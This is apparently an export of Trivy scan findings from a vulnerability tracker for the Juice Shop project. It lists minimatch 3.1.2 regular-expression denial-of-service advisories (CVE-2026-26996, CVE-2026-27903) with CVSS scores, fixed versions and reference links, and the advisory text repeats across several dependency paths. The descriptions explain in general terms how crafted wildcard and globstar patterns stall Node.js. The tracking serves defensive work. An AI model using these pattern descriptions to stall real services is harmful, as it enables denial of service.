Shop,,CVE-2026-26996,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],minimatch,3.1.2,2026-05-12 17:37:05.257864+00:00,,,CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N,8.7,1333,2026-05-12,,,"minimatch: minimatch: Denial of Service via specially crafted glob patterns NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3 NEWLINE NEWLINE minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Versions 10.2.0 and below are vulnerable to Regular Expression Denial of Service (ReDoS) when a glob pattern contains many consecutive * wildcards followed by a literal character that doesn't appear in the test string. Each * compiles to a separate [^/]*? regex group, and when the match fails, V8's regex engine backtracks exponentially across all possible splits. The time complexity is O(4^N) where N is the number of * characters. With N=15, a single minimatch() call takes ~2 seconds. With N=34, it hangs effectively forever. Any application that passes user-controlled strings to minimatch() as the pattern argument is vulnerable to DoS. This issue has been fixed in version 10.2.1. 
NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/ts-node-dev/node_modules/minimatch/package.json,,True,,False,False,,False,,67e2ee7200dc183bf99b8a81950e2f5325d5f69071180e5fd639fe5c81943fee,143,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.257920+00:00,,,,,0,[],"10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3",,S1,False,,,,,,,,False,https://access.redhat.com/errata/RHSA-2026:7896 NEWLINE https://access.redhat.com/security/cve/CVE-2026-26996 NEWLINE https://bugzilla.redhat.com/2441268 NEWLINE https://bugzilla.redhat.com/2442922 NEWLINE https://bugzilla.redhat.com/2448754 NEWLINE https://bugzilla.redhat.com/2453151 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2441268 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2442922 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2448754 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2453151 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904 NEWLINE https://errata.almalinux.org/9/ALSA-2026-7896.html NEWLINE https://errata.rockylinux.org/RLSA-2026:7896 NEWLINE https://github.com/isaacs/minimatch NEWLINE https://github.com/isaacs/minimatch/commit/2e111f3a79abc00fa73110195de2c0f2351904f5 NEWLINE https://github.com/isaacs/minimatch/security/advisories/GHSA-3ppc-4f35-3m26 NEWLINE https://linux.oracle.com/cve/CVE-2026-26996.html NEWLINE https://linux.oracle.com/errata/ELSA-2026-8339.html NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-26996 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-26996,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-26996 Minimatch 3.1.2,False,False,,2026-05-12 17:37:05.257873+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice 
Shop,,CVE-2026-26996,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],minimatch,3.1.2,2026-05-12 17:37:05.261314+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H,7.5,,,407,2026-05-12,,,"minimatch: minimatch: Denial of Service due to unbounded recursive backtracking via crafted glob patterns NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3 NEWLINE NEWLINE minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Prior to version 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3, `matchOne()` performs unbounded recursive backtracking when a glob pattern contains multiple non-adjacent `**` (GLOBSTAR) segments and the input path does not match. The time complexity is O(C(n, k)) -- binomial -- where `n` is the number of path segments and `k` is the number of globstars. With k=11 and n=30, a call to the default `minimatch()` API stalls for roughly 5 seconds. With k=13, it exceeds 15 seconds. No memoization or call budget exists to bound this behavior. Any application where an attacker can influence the glob pattern passed to `minimatch()` is vulnerable. The realistic attack surface includes build tools and task runners that accept user-supplied glob arguments (ESLint, Webpack, Rollup config), multi-tenant systems where one tenant configures glob-based rules that run in a shared process, admin or developer interfaces that accept ignore-rule or filter configuration as globs, and CI/CD pipelines that evaluate user-submitted config files containing glob patterns. An attacker who can place a crafted pattern into any of these paths can stall the Node.js event loop for tens of seconds per invocation. The pattern is 56 bytes for a 5-second stall and does not require authentication in contexts where pattern input is part of the feature. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3 fix the issue. 
NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/archiver-utils/node_modules/minimatch/package.json,,True,,False,False,,False,,721b20e644b18dd53a1b0019098d6e2f61f590ace522dc66799f682ecb6ee02c,144,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.261370+00:00,,,,,0,[],"10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3",,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-27903 NEWLINE https://github.com/isaacs/minimatch NEWLINE https://github.com/isaacs/minimatch/commit/0bf499aa45f5059b56809cc3b75ff3eafeb8d748 NEWLINE https://github.com/isaacs/minimatch/security/advisories/GHSA-7r86-cg39-jmmj NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-27903 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-27903,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-27903 Minimatch 3.1.2,False,False,,2026-05-12 17:37:05.261322+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-27903,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],minimatch,3.1.2,2026-05-12 17:37:05.264857+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H,7.5,,,407,2026-05-12,,,"minimatch: minimatch: Denial of Service due to unbounded recursive backtracking via crafted glob patterns NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3 NEWLINE NEWLINE minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Prior to version 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3, `matchOne()` performs unbounded recursive backtracking when a glob pattern contains multiple non-adjacent `**` (GLOBSTAR) segments and the input path does not match. The time complexity is O(C(n, k)) -- binomial -- where `n` is the number of path segments and `k` is the number of globstars. 
With k=11 and n=30, a call to the default `minimatch()` API stalls for roughly 5 seconds. With k=13, it exceeds 15 seconds. No memoization or call budget exists to bound this behavior. Any application where an attacker can influence the glob pattern passed to `minimatch()` is vulnerable. The realistic attack surface includes build tools and task runners that accept user-supplied glob arguments (ESLint, Webpack, Rollup config), multi-tenant systems where one tenant configures glob-based rules that run in a shared process, admin or developer interfaces that accept ignore-rule or filter configuration as globs, and CI/CD pipelines that evaluate user-submitted config files containing glob patterns. An attacker who can place a crafted pattern into any of these paths can stall the Node.js event loop for tens of seconds per invocation. The pattern is 56 bytes for a 5-second stall and does not require authentication in contexts where pattern input is part of the feature. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3 fix the issue. 
NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/archiver/node_modules/minimatch/package.json,,True,,False,False,,False,,721b20e644b18dd53a1b0019098d6e2f61f590ace522dc66799f682ecb6ee02c,145,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.264911+00:00,,,,,0,[],"10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3",,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-27903 NEWLINE https://github.com/isaacs/minimatch NEWLINE https://github.com/isaacs/minimatch/commit/0bf499aa45f5059b56809cc3b75ff3eafeb8d748 NEWLINE https://github.com/isaacs/minimatch/security/advisories/GHSA-7r86-cg39-jmmj NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-27903 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-27903,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-27903 Minimatch 3.1.2,False,False,,2026-05-12 17:37:05.264865+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-27903,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],minimatch,3.1.2,2026-05-12 17:37:05.268675+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H,7.5,,,407,2026-05-12,,,"minimatch: minimatch: Denial of Service due to unbounded recursive backtracking via crafted glob patterns NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3 NEWLINE NEWLINE minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Prior to version 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3, `matchOne()` performs unbounded recursive backtracking when a glob pattern contains multiple non-adjacent `**` (GLOBSTAR) segments and the input path does not match. The time complexity is O(C(n, k)) -- binomial -- where `n` is the number of path segments and `k` is the number of globstars. 
With k=11 and n=30, a call to the default `minimatch()` API stalls for roughly 5 seconds. With k=13, it exceeds 15 seconds. No memoization or call budget exists to bound this behavior. Any application where an attacker can influence the glob pattern passed to `minimatch()` is vulnerable. The realistic attack surface includes build tools and task runners that accept user-supplied glob arguments (ESLint, Webpack, Rollup config), multi-tenant systems where one tenant configures glob-based rules that run in a shared process, admin or developer interfaces that accept ignore-rule or filter configuration as globs, and CI/CD pipelines that evaluate user-submitted config files containing glob patterns. An attacker who can place a crafted pattern into any of these paths can stall the Node.js event loop for tens of seconds per invocation. The pattern is 56 bytes for a 5-second stall and does not require authentication in contexts where pattern input is part of the feature. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3 fix the issue. 
NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/file-js/node_modules/minimatch/package.json,,True,,False,False,,False,,721b20e644b18dd53a1b0019098d6e2f61f590ace522dc66799f682ecb6ee02c,146,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.268767+00:00,,,,,0,[],"10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3",,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-27903 NEWLINE https://github.com/isaacs/minimatch NEWLINE https://github.com/isaacs/minimatch/commit/0bf499aa45f5059b56809cc3b75ff3eafeb8d748 NEWLINE https://github.com/isaacs/minimatch/security/advisories/GHSA-7r86-cg39-jmmj NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-27903 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-27903,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-27903 Minimatch 3.1.2,False,False,,2026-05-12 17:37:05.268686+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-27903,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],minimatch,3.1.2,2026-05-12 17:37:05.273545+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H,7.5,,,407,2026-05-12,,,"minimatch: minimatch: Denial of Service due to unbounded recursive backtracking via crafted glob patterns NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3 NEWLINE NEWLINE minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Prior to version 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3, `matchOne()` performs unbounded recursive backtracking when a glob pattern contains multiple non-adjacent `**` (GLOBSTAR) segments and the input path does not match. The time complexity is O(C(n, k)) -- binomial -- where `n` is the number of path segments and `k` is the number of globstars. 
With k=11 and n=30, a call to the default `minimatch()` API stalls for roughly 5 seconds. With k=13, it exceeds 15 seconds. No memoization or call budget exists to bound this behavior. Any application where an attacker can influence the glob pattern passed to `minimatch()` is vulnerable. The realistic attack surface includes build tools and task runners that accept user-supplied glob arguments (ESLint, Webpack, Rollup config), multi-tenant systems where one tenant configures glob-based rules that run in a shared process, admin or developer interfaces that accept ignore-rule or filter configuration as globs, and CI/CD pipelines that evaluate user-submitted config files containing glob patterns. An attacker who can place a crafted pattern into any of these paths can stall the Node.js event loop for tens of seconds per invocation. The pattern is 56 bytes for a 5-second stall and does not require authentication in contexts where pattern input is part of the feature. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3 fix the issue. 
NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/fstream/node_modules/minimatch/package.json,,True,,False,False,,False,,721b20e644b18dd53a1b0019098d6e2f61f590ace522dc66799f682ecb6ee02c,147,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.273601+00:00,,,,,0,[],"10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3",,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-27903 NEWLINE https://github.com/isaacs/minimatch NEWLINE https://github.com/isaacs/minimatch/commit/0bf499aa45f5059b56809cc3b75ff3eafeb8d748 NEWLINE https://github.com/isaacs/minimatch/security/advisories/GHSA-7r86-cg39-jmmj NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-27903 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-27903,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-27903 Minimatch 3.1.2,False,False,,2026-05-12 17:37:05.273554+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-27903,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],minimatch,3.1.2,2026-05-12 17:37:05.277054+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H,7.5,,,407,2026-05-12,,,"minimatch: minimatch: Denial of Service due to unbounded recursive backtracking via crafted glob patterns NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3 NEWLINE NEWLINE minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Prior to version 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3, `matchOne()` performs unbounded recursive backtracking when a glob pattern contains multiple non-adjacent `**` (GLOBSTAR) segments and the input path does not match. The time complexity is O(C(n, k)) -- binomial -- where `n` is the number of path segments and `k` is the number of globstars. 
With k=11 and n=30, a call to the default `minimatch()` API stalls for roughly 5 seconds. With k=13, it exceeds 15 seconds. No memoization or call budget exists to bound this behavior. Any application where an attacker can influence the glob pattern passed to `minimatch()` is vulnerable. The realistic attack surface includes build tools and task runners that accept user-supplied glob arguments (ESLint, Webpack, Rollup config), multi-tenant systems where one tenant configures glob-based rules that run in a shared process, admin or developer interfaces that accept ignore-rule or filter configuration as globs, and CI/CD pipelines that evaluate user-submitted config files containing glob patterns. An attacker who can place a crafted pattern into any of these paths can stall the Node.js event loop for tens of seconds per invocation. The pattern is 56 bytes for a 5-second stall and does not require authentication in contexts where pattern input is part of the feature. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3 fix the issue. 
NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/ignore-walk/node_modules/minimatch/package.json,,True,,False,False,,False,,721b20e644b18dd53a1b0019098d6e2f61f590ace522dc66799f682ecb6ee02c,148,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.277107+00:00,,,,,0,[],"10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3",,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-27903 NEWLINE https://github.com/isaacs/minimatch NEWLINE https://github.com/isaacs/minimatch/commit/0bf499aa45f5059b56809cc3b75ff3eafeb8d748 NEWLINE https://github.com/isaacs/minimatch/security/advisories/GHSA-7r86-cg39-jmmj NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-27903 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-27903,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-27903 Minimatch 3.1.2,False,False,,2026-05-12 17:37:05.277061+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-27903,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],minimatch,3.1.2,2026-05-12 17:37:05.281203+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H,7.5,,,407,2026-05-12,,,"minimatch: minimatch: Denial of Service due to unbounded recursive backtracking via crafted glob patterns NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3 NEWLINE NEWLINE minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Prior to version 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3, `matchOne()` performs unbounded recursive backtracking when a glob pattern contains multiple non-adjacent `**` (GLOBSTAR) segments and the input path does not match. The time complexity is O(C(n, k)) -- binomial -- where `n` is the number of path segments and `k` is the number of globstars. 
With k=11 and n=30, a call to the default `minimatch()` API stalls for roughly 5 seconds. With k=13, it exceeds 15 seconds. No memoization or call budget exists to bound this behavior. Any application where an attacker can influence the glob pattern passed to `minimatch()` is vulnerable. The realistic attack surface includes build tools and task runners that accept user-supplied glob arguments (ESLint, Webpack, Rollup config), multi-tenant systems where one tenant configures glob-based rules that run in a shared process, admin or developer interfaces that accept ignore-rule or filter configuration as globs, and CI/CD pipelines that evaluate user-submitted config files containing glob patterns. An attacker who can place a crafted pattern into any of these paths can stall the Node.js event loop for tens of seconds per invocation. The pattern is 56 bytes for a 5-second stall and does not require authentication in contexts where pattern input is part of the feature. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3 fix the issue. 
NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/node-pre-gyp/node_modules/minimatch/package.json,,True,,False,False,,False,,721b20e644b18dd53a1b0019098d6e2f61f590ace522dc66799f682ecb6ee02c,149,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.281258+00:00,,,,,0,[],"10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3",,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-27903 NEWLINE https://github.com/isaacs/minimatch NEWLINE https://github.com/isaacs/minimatch/commit/0bf499aa45f5059b56809cc3b75ff3eafeb8d748 NEWLINE https://github.com/isaacs/minimatch/security/advisories/GHSA-7r86-cg39-jmmj NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-27903 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-27903,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-27903 Minimatch 3.1.2,False,False,,2026-05-12 17:37:05.281211+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-27903,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],minimatch,3.1.2,2026-05-12 17:37:05.285048+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H,7.5,,,407,2026-05-12,,,"minimatch: minimatch: Denial of Service due to unbounded recursive backtracking via crafted glob patterns NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3 NEWLINE NEWLINE minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Prior to version 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3, `matchOne()` performs unbounded recursive backtracking when a glob pattern contains multiple non-adjacent `**` (GLOBSTAR) segments and the input path does not match. The time complexity is O(C(n, k)) -- binomial -- where `n` is the number of path segments and `k` is the number of globstars. 
With k=11 and n=30, a call to the default `minimatch()` API stalls for roughly 5 seconds. With k=13, it exceeds 15 seconds. No memoization or call budget exists to bound this behavior. Any application where an attacker can influence the glob pattern passed to `minimatch()` is vulnerable. The realistic attack surface includes build tools and task runners that accept user-supplied glob arguments (ESLint, Webpack, Rollup config), multi-tenant systems where one tenant configures glob-based rules that run in a shared process, admin or developer interfaces that accept ignore-rule or filter configuration as globs, and CI/CD pipelines that evaluate user-submitted config files containing glob patterns. An attacker who can place a crafted pattern into any of these paths can stall the Node.js event loop for tens of seconds per invocation. The pattern is 56 bytes for a 5-second stall and does not require authentication in contexts where pattern input is part of the feature. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3 fix the issue. 
NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/rimraf/node_modules/minimatch/package.json,,True,,False,False,,False,,721b20e644b18dd53a1b0019098d6e2f61f590ace522dc66799f682ecb6ee02c,150,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.285108+00:00,,,,,0,[],"10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3",,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-27903 NEWLINE https://github.com/isaacs/minimatch NEWLINE https://github.com/isaacs/minimatch/commit/0bf499aa45f5059b56809cc3b75ff3eafeb8d748 NEWLINE https://github.com/isaacs/minimatch/security/advisories/GHSA-7r86-cg39-jmmj NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-27903 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-27903,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-27903 Minimatch 3.1.2,False,False,,2026-05-12 17:37:05.285058+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-27903,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],minimatch,3.1.2,2026-05-12 17:37:05.289779+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H,7.5,,,407,2026-05-12,,,"minimatch: minimatch: Denial of Service due to unbounded recursive backtracking via crafted glob patterns NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3 NEWLINE NEWLINE minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Prior to version 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3, `matchOne()` performs unbounded recursive backtracking when a glob pattern contains multiple non-adjacent `**` (GLOBSTAR) segments and the input path does not match. The time complexity is O(C(n, k)) -- binomial -- where `n` is the number of path segments and `k` is the number of globstars. 
With k=11 and n=30, a call to the default `minimatch()` API stalls for roughly 5 seconds. With k=13, it exceeds 15 seconds. No memoization or call budget exists to bound this behavior. Any application where an attacker can influence the glob pattern passed to `minimatch()` is vulnerable. The realistic attack surface includes build tools and task runners that accept user-supplied glob arguments (ESLint, Webpack, Rollup config), multi-tenant systems where one tenant configures glob-based rules that run in a shared process, admin or developer interfaces that accept ignore-rule or filter configuration as globs, and CI/CD pipelines that evaluate user-submitted config files containing glob patterns. An attacker who can place a crafted pattern into any of these paths can stall the Node.js event loop for tens of seconds per invocation. The pattern is 56 bytes for a 5-second stall and does not require authentication in contexts where pattern input is part of the feature. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3 fix the issue. 
NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/sqlite3/node_modules/minimatch/package.json,,True,,False,False,,False,,721b20e644b18dd53a1b0019098d6e2f61f590ace522dc66799f682ecb6ee02c,151,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.289838+00:00,,,,,0,[],"10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3",,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-27903 NEWLINE https://github.com/isaacs/minimatch NEWLINE https://github.com/isaacs/minimatch/commit/0bf499aa45f5059b56809cc3b75ff3eafeb8d748 NEWLINE https://github.com/isaacs/minimatch/security/advisories/GHSA-7r86-cg39-jmmj NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-27903 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-27903,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-27903 Minimatch 3.1.2,False,False,,2026-05-12 17:37:05.289788+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-27903,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],minimatch,3.1.2,2026-05-12 17:37:05.293718+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H,7.5,,,407,2026-05-12,,,"minimatch: minimatch: Denial of Service due to unbounded recursive backtracking via crafted glob patterns NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3 NEWLINE NEWLINE minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Prior to version 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3, `matchOne()` performs unbounded recursive backtracking when a glob pattern contains multiple non-adjacent `**` (GLOBSTAR) segments and the input path does not match. The time complexity is O(C(n, k)) -- binomial -- where `n` is the number of path segments and `k` is the number of globstars. 
With k=11 and n=30, a call to the default `minimatch()` API stalls for roughly 5 seconds. With k=13, it exceeds 15 seconds. No memoization or call budget exists to bound this behavior. Any application where an attacker can influence the glob pattern passed to `minimatch()` is vulnerable. The realistic attack surface includes build tools and task runners that accept user-supplied glob arguments (ESLint, Webpack, Rollup config), multi-tenant systems where one tenant configures glob-based rules that run in a shared process, admin or developer interfaces that accept ignore-rule or filter configuration as globs, and CI/CD pipelines that evaluate user-submitted config files containing glob patterns. An attacker who can place a crafted pattern into any of these paths can stall the Node.js event loop for tens of seconds per invocation. The pattern is 56 bytes for a 5-second stall and does not require authentication in contexts where pattern input is part of the feature. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3 fix the issue. 
